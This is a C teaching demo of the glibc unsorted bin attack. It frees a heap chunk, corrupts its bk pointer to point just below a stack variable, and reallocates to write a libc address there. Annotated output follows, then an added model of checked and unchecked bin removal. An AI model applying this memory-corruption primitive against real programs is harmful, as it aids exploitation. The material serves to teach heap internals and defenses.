#include <stdio.h>
#include <stdlib.h>

int main(){
	printf("This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n");
	printf("In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "
		   "global variable global_max_fast in libc for further fastbin attack\n\n");

	// The target: an ordinary stack variable, initially 0
	unsigned long stack_var=0;
	printf("Let's first look at the target we want to rewrite on stack:\n");
	printf("%p: %lu\n\n", (void*)&stack_var, stack_var);

	unsigned long *p=malloc(400);
	printf("Now, we allocate first normal chunk on the heap at: %p\n",(void*)p);
	printf("And allocate another normal chunk in order to avoid consolidating the top chunk with "
		   "the first one during the free()\n\n");
	// The second allocation sits between p's chunk and the top chunk
	malloc(500);

	free(p);
	// p[0] and p[1] now hold the freed chunk's fd and bk (intentional read after free)
	printf("We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "
		   "point to %p\n",(void*)p[1]);

	//------------VULNERABILITY-----------

	// &stack_var-2 is arithmetic on unsigned long*: 2 * 8 = 16 bytes below the target
	p[1]=(unsigned long)(&stack_var-2);
	printf("Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
	printf("And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]);

	//------------------------------------

	// Serving this request removes the chunk from the unsorted bin and writes through bk
	malloc(400);
	printf("Let's malloc again to get the chunk we just free. During this time, target should has already been "
		   "rewrite:\n");
	printf("%p: %p\n", (void*)&stack_var, (void*)stack_var);
	return 0;
}

This file demonstrates unsorted bin attack by write a large unsigned long value into stack

This file demonstrates the unsorted bin attack by writing a large unsigned long value onto the stack.


In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the global variable global_max_fast in libc for further fastbin attack

In practice, the unsorted bin attack is usually a preparation step for a further attack, for example rewriting the global variable global_max_fast in libc so that a fastbin attack can follow.


unsigned long stack_var=0;


Let's first look at the target we want to rewrite on stack:

0x7ffdd1787990 (address of stack_var): 0

First, let's look at the target on the stack that we want to overwrite.


unsigned long *p=malloc(400);

Now, we allocate first normal chunk on the heap at: 0x85f420

We have now allocated the first normal chunk on the heap, at 0x85f420.


And allocate another normal chunk in order to avoid consolidating the top chunk with the first one during the free()

Then we allocate another normal chunk, so that the first chunk is not consolidated with the top chunk during free().

malloc(500); free(p);

We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer point to 0x7fb468becb58 (p[1])

We now free the first chunk. It is inserted into the unsorted bin, and its bk pointer (p[1]) holds the address shown above.

p[1]=(unsigned long)(&stack_var-2);


Now emulating a vulnerability that can overwrite the victim->bk pointer

Now let's emulate a vulnerability that overwrites the victim's bk pointer.


And we write it with the target address-16 (in 32-bits machine, it should be target address-8):0x7ffdd1787980

We write the value target address - 16 into it (on a 32-bit machine this has to be target address - 8).

malloc(400);

Let's malloc again to get the chunk we just free. During this time, target should has already been rewrite:

0x7ffdd1787990(&stack_var): 0x7fb468becb58

We call malloc again to get back the chunk we just freed.

By this point, the target has already been rewritten.
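
Why the write lands on stack_var, and what a list-consistency check changes, as an added example that is not part of the original post or of how2heap. It models the unsorted-bin removal step on ordinary structs instead of the real heap; `struct chunk`, `bin`, `take_unchecked`, `take_checked` and `scenario` are hypothetical names, and the check is of the kind later glibc releases apply on this path.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Simplified chunk header; field order follows glibc's malloc_chunk. */
struct chunk { size_t prev_size, size; struct chunk *fd, *bk; };

static struct chunk bin;   /* stands in for the unsorted bin head inside libc */

/* Removal as the demo's allocator performs it: victim->bk is trusted. */
static int take_unchecked(struct chunk *victim) {
	struct chunk *bck = victim->bk;
	bin.bk = bck;
	bck->fd = &bin;        /* stores &bin at (char *)bck + offsetof(fd) */
	return 0;
}

/* Same removal, but the doubly linked list must be consistent first. */
static int take_checked(struct chunk *victim) {
	struct chunk *bck = victim->bk;
	if (bck->fd != victim || victim->fd != &bin)
		return -1;         /* corrupted list: refuse instead of writing */
	bin.bk = bck;
	bck->fd = &bin;
	return 0;
}

/* Constructed scenario: frame.fd plays stack_var, so &frame is the
   "target address - 16" value, offsetof(struct chunk, fd) bytes below it. */
static uintptr_t scenario(int corrupt, int checked, int *rc) {
	struct chunk frame = {0, 0, NULL, NULL};
	struct chunk victim = {0, 0x1a1, &bin, &bin};  /* freed chunk, only bin entry */
	bin.fd = bin.bk = &victim;
	if (corrupt)
		victim.bk = &frame;                        /* the emulated bk overwrite */
	*rc = checked ? take_checked(&victim) : take_unchecked(&victim);
	return (uintptr_t)frame.fd;                    /* value left in the target */
}

int main(void) {
	int rc;
	printf("fd sits %zu bytes into a chunk\n", offsetof(struct chunk, fd));
	uintptr_t t = scenario(1, 0, &rc);
	printf("unchecked: target=%#lx (bin at %p)\n", (unsigned long)t, (void *)&bin);
	t = scenario(1, 1, &rc);
	printf("checked:   target=%#lx rc=%d\n", (unsigned long)t, rc);
	return 0;
}
```

The offset of `fd` is two `size_t` fields, which gives the 16 bytes on 64-bit and the 8 bytes on 32-bit that the demo mentions.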



